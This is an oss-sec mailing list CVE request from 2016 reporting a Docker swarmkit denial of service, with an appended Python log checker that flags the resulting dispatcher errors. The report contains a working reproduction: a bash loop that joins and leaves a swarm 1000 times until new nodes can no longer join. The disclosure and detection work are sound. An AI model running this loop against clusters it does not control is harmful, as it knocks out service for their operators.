oss-sec mailing list archives
cve request: docker swarmkit DoS occurs by repeatedly joining and quitting swarm cluster as a node
From: 张开翔 <zhangkaixiang () 360 cn>
Date: Fri, 29 Jul 2016 09:47:31 +0000
Docker swarmkit is used to form a swarm, coordinating tasks. Once a machine joins, it becomes a Swarm Node. Nodes can either be worker nodes or manager nodes.

I found a vulnerability in the latest version of docker which could cause a Denial of Service: a machine could not join the swarm cluster after another node repeatedly joined and quit the swarm many times (taking my testing as an example, it should need at least one thousand times). Moreover, the docker debugging info indicates the Dispatcher is stopped, and the CA server may have exited sometimes.

# docker version
Client:
 Version:      1.12.0-dev
 API version:  1.25
 Go version:   go1.6.3
 Git commit:   9c1be54-unsupported
 Built:        Fri Jul 29 15:40:52 2016
 OS/Arch:      linux/amd64

Server:
 Version:      1.12.0-dev
 API version:  1.25
 Go version:   go1.6.3
 Git commit:   9c1be54-unsupported
 Built:        Fri Jul 29 15:40:52 2016
 OS/Arch:      linux/amd64

# docker swarm init
Swarm initialized: current node (23m6ksr96whsvuo8lzokenju3) is now a manager.

To add a worker to this swarm, run the following command:
    docker swarm join \
    --token SWMTKN-1-30f6ibzpscqh05qqdog85ktr8ptcw7ttn4wy5cwixy1wfchhb9-aljewtdn5727g1pldxnevjh51 \
    xx.xx.xx.xx:2377

To add a manager to this swarm, run the following command:
    docker swarm join \
    --token SWMTKN-1-30f6ibzpscqh05qqdog85ktr8ptcw7ttn4wy5cwixy1wfchhb9-0p086z2sdbnpvognjmu76gpi6 \
    xx.xx.xx.xx:2377

Log in to machine A1, join the swarm, and then quit the swarm.
-----------------------------------------------------
# docker swarm join --token SWMTKN-1-30f6ibzpscqh05qqdog85ktr8ptcw7ttn4wy5cwixy1wfchhb9-aljewtdn5727g1pldxnevjh51 xx.xx.xx.xx:2377
This node joined a swarm as a worker.
# docker swarm leave --force
Node left the swarm.

Log in to machine A2 and repeatedly join and quit the swarm 1000 times.
-----------------------------------------------------
# for i in {1..1000}; do docker swarm leave --force ; docker swarm join --token SWMTKN-1-30f6ibzpscqh05qqdog85ktr8ptcw7ttn4wy5cwixy1wfchhb9-aljewtdn5727g1pldxnevjh51 xx.xx.xx.xx:2377 ;done
This node joined a swarm as a worker.
Node left the swarm.
This node joined a swarm as a worker.
Node left the swarm.
This node joined a swarm as a worker.
Node left the swarm.
This node joined a swarm as a worker.
Node left the swarm.
This node joined a swarm as a worker.
Node left the swarm.

After finishing that, log in to machine A1 again and attempt to join the swarm; it failed.
--------------------------------------------------------
# docker swarm join --token SWMTKN-1-30f6ibzpscqh05qqdog85ktr8ptcw7ttn4wy5cwixy1wfchhb9-aljewtdn5727g1pldxnevjh51 xx.xx.xx.xx:2377
Error response from daemon: Timeout was reached before node was joined. Attempt to join the cluster will continue in the background. Use "docker info" command to see the current swarm status of your node.

Some debugging information from the docker daemon:
---------------------------------------------------------
time="2016-07-29T15:24:02.374560815+08:00" level=error msg="failed to remove node" error="rpc error: code = 10 desc = dispatcher is stopped" method="(*Dispatcher).Session" node.id=b11ta5p8g2wgy10vyzgsi6ocm node.session=1aph8scsewn89j3h5o3emgdql
time="2016-07-29T15:24:02.374604898+08:00" level=error msg=" session failed" error="rpc error: code = 1 desc = context canceled" module=agent
time="2016-07-29T15:24:14.069347074+08:00" level=debug msg="heartbeat expiration"
time="2016-07-29T15:24:14.069428834+08:00" level=error msg="failed deregistering node after heartbeat expiration" error="rpc error: code = 10 desc = dispatcher is stopped"
… …

Please assign CVE IDs for the security issue.

Best regards,
Kaixiang Zhang of the Cloud Security Team, Qihoo 360
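Added example, not part of the original post: a Python check that parses daemon log lines in the format quoted above and flags the "dispatcher is stopped" errors a manager emitted in this report. The sample lines are copied from the post; the five-minute window, the threshold of two, and all function names are assumptions of this example.

```python
import re
from datetime import datetime, timedelta

# Daemon log lines quoted in the post above (logfmt: key=value or key="quoted value").
SAMPLE_LOG = '''\
time="2016-07-29T15:24:02.374560815+08:00" level=error msg="failed to remove node" error="rpc error: code = 10 desc = dispatcher is stopped" method="(*Dispatcher).Session" node.id=b11ta5p8g2wgy10vyzgsi6ocm node.session=1aph8scsewn89j3h5o3emgdql
time="2016-07-29T15:24:02.374604898+08:00" level=error msg=" session failed" error="rpc error: code = 1 desc = context canceled" module=agent
time="2016-07-29T15:24:14.069347074+08:00" level=debug msg="heartbeat expiration"
time="2016-07-29T15:24:14.069428834+08:00" level=error msg="failed deregistering node after heartbeat expiration" error="rpc error: code = 10 desc = dispatcher is stopped"
'''
SIGNATURE = "dispatcher is stopped"  # error text shown in the post's log excerpt
PAIR = re.compile(r'([\w.]+)=("(?:[^"\\]|\\.)*"|\S+)')
STAMP = re.compile(r'(.+?)(?:\.(\d+))?(Z|[+-]\d{2}:\d{2})$')

def parse_logfmt(line):
    """Split one logfmt line into a dict, dropping the quotes around quoted values."""
    return {k: v[1:-1] if v.startswith('"') else v for k, v in PAIR.findall(line)}

def parse_time(value):
    """Parse an RFC 3339 timestamp, truncating nanoseconds to microseconds."""
    base, frac, tz = STAMP.match(value).groups()
    frac = (frac or "0")[:6].ljust(6, "0")
    return datetime.fromisoformat(f"{base}.{frac}{'+00:00' if tz == 'Z' else tz}")

def dispatcher_stopped_events(log_text):
    """Return error records, oldest first, whose error field carries SIGNATURE."""
    events = []
    for line in log_text.splitlines():
        rec = parse_logfmt(line)
        if rec.get("level") == "error" and SIGNATURE in rec.get("error", "") and "time" in rec:
            rec["when"] = parse_time(rec["time"])
            events.append(rec)
    return sorted(events, key=lambda r: r["when"])

def summarize(events, window=timedelta(minutes=5), threshold=2):
    """Alert when any `window` holds >= `threshold` events (both values are assumptions)."""
    best = lo = 0
    for hi, rec in enumerate(events):  # sliding window over sorted timestamps
        while rec["when"] - events[lo]["when"] > window:
            lo += 1
        best = max(best, hi - lo + 1)
    return {
        "alert": best >= threshold,
        "count": len(events),
        "nodes": sorted({r["node.id"] for r in events if "node.id" in r}),
        "messages": [r["msg"] for r in events],
    }

if __name__ == "__main__":
    print(summarize(dispatcher_stopped_events(SAMPLE_LOG)))
```
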